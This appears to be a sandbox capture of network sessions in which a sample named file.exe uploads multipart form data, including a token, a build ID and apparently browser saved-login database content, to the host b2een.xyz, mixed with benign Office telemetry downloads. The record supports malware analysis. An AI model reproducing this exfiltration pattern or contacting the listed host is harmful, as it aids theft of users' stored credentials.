2024-11-25 10:33:49 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.5	49810	49.13.32.95	443	6520	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:50 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHCAKKEGCAAFHJJJDBKJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: b2een.xyz Content-Length: 505 Connection: Keep-Alive Cache-Control: no-cache
2024-11-25 10:33:50 UTC	505	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 64 34 35 36 37 31 63 63 33 31 61 66 37 61 36 39 34 30 64 65 39 35 63 32 33 33 33 32 64 61 33 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 33 65 34 66 32 64 65 63 31 34 32 38 30 30 39 66 38 62 63 37 35 35 65 38 33 61 32 31 64 31 62 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 4a 0d 0a 43 6f 6e 74 Data Ascii: ------GHCAKKEGCAAFHJJJDBKJContent-Disposition: form-data; name="token"6d45671cc31af7a6940de95c23332da3------GHCAKKEGCAAFHJJJDBKJContent-Disposition: form-data; name="build_id"93e4f2dec1428009f8bc755e83a21d1b------GHCAKKEGCAAFHJJJDBKJCont
2024-11-25 10:33:51 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 10:33:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-25 10:33:51 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.5	49812	23.218.208.109	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:51 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-11-25 10:33:51 UTC	534	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y= Cache-Control: public, max-age=82758 Date: Mon, 25 Nov 2024 10:33:51 GMT Content-Length: 55 Connection: close X-CID: 2
2024-11-25 10:33:51 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.5	49813	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:51 UTC	192	OUT	GET /rules/rule120675v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:51 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:51 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6CF78C8" x-ms-request-id: 7ea39611-a01e-003d-41b8-3e98d7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103351Z-178bfbc474bmqmgjhC1NYCy16c00000007gg000000000v0k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:51 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.5	49818	49.13.32.95	443	6520	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:51 UTC	318	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEBAAFCAFCBKFHJJJKKF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: b2een.xyz Content-Length: 55081 Connection: Keep-Alive Cache-Control: no-cache
2024-11-25 10:33:51 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 64 34 35 36 37 31 63 63 33 31 61 66 37 61 36 39 34 30 64 65 39 35 63 32 33 33 33 32 64 61 33 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 33 65 34 66 32 64 65 63 31 34 32 38 30 30 39 66 38 62 63 37 35 35 65 38 33 61 32 31 64 31 62 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 Data Ascii: ------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="token"6d45671cc31af7a6940de95c23332da3------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="build_id"93e4f2dec1428009f8bc755e83a21d1b------IEBAAFCAFCBKFHJJJKKFCont
2024-11-25 10:33:51 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-25 10:33:51 UTC	16355	OUT	Data Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
2024-11-25 10:33:51 UTC	6016	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-25 10:33:52 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 10:33:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-25 10:33:52 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.5	49814	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:51 UTC	192	OUT	GET /rules/rule120676v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:51 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:51 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B984BF177" x-ms-request-id: 00c17fdd-701e-000d-2f70-3c6de3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103351Z-174c587ffdfb74xqhC1TEBhabc00000005x0000000001phb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:51 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.5	49816	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:51 UTC	192	OUT	GET /rules/rule120677v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:51 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:51 GMT Content-Type: text/xml Content-Length: 405 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT ETag: "0x8DC582B942B6AFF" x-ms-request-id: 964846c7-701e-001e-36c3-3bf5e6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103351Z-174c587ffdf8fcgwhC1TEBnn7000000005ug00000000q9u4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:51 UTC	405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.5	49815	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:51 UTC	192	OUT	GET /rules/rule120678v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:51 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:51 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA642BF4" x-ms-request-id: 07e1e155-901e-0029-69bf-3e274a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103351Z-178bfbc474bwlrhlhC1NYCy3kg000000078g00000000apku x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-25 10:33:51 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.5	49817	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:51 UTC	192	OUT	GET /rules/rule120679v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:52 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:51 GMT Content-Type: text/xml Content-Length: 174 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91D80E15" x-ms-request-id: 6f884587-b01e-0001-3155-3c46e2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103351Z-15b8b599d88hr8sfhC1TEBbca400000005m000000000ff4m x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:52 UTC	174	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.5	49819	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:53 UTC	192	OUT	GET /rules/rule120680v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:53 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:53 GMT Content-Type: text/xml Content-Length: 1952 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B956B0F3D" x-ms-request-id: 6b04d5e8-e01e-000c-65ad-3b8e36000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103353Z-174c587ffdfcb7qhhC1TEB3x7000000005yg000000003n1k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:53 UTC	1952	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.5	49824	49.13.32.95	443	6520	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:53 UTC	319	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFHCBKKFIJJJECAAFCGI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: b2een.xyz Content-Length: 142457 Connection: Keep-Alive Cache-Control: no-cache
2024-11-25 10:33:53 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 46 48 43 42 4b 4b 46 49 4a 4a 4a 45 43 41 41 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 64 34 35 36 37 31 63 63 33 31 61 66 37 61 36 39 34 30 64 65 39 35 63 32 33 33 33 32 64 61 33 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 42 4b 4b 46 49 4a 4a 4a 45 43 41 41 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 33 65 34 66 32 64 65 63 31 34 32 38 30 30 39 66 38 62 63 37 35 35 65 38 33 61 32 31 64 31 62 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 42 4b 4b 46 49 4a 4a 4a 45 43 41 41 46 43 47 49 0d 0a 43 6f 6e 74 Data Ascii: ------CFHCBKKFIJJJECAAFCGIContent-Disposition: form-data; name="token"6d45671cc31af7a6940de95c23332da3------CFHCBKKFIJJJECAAFCGIContent-Disposition: form-data; name="build_id"93e4f2dec1428009f8bc755e83a21d1b------CFHCBKKFIJJJECAAFCGICont
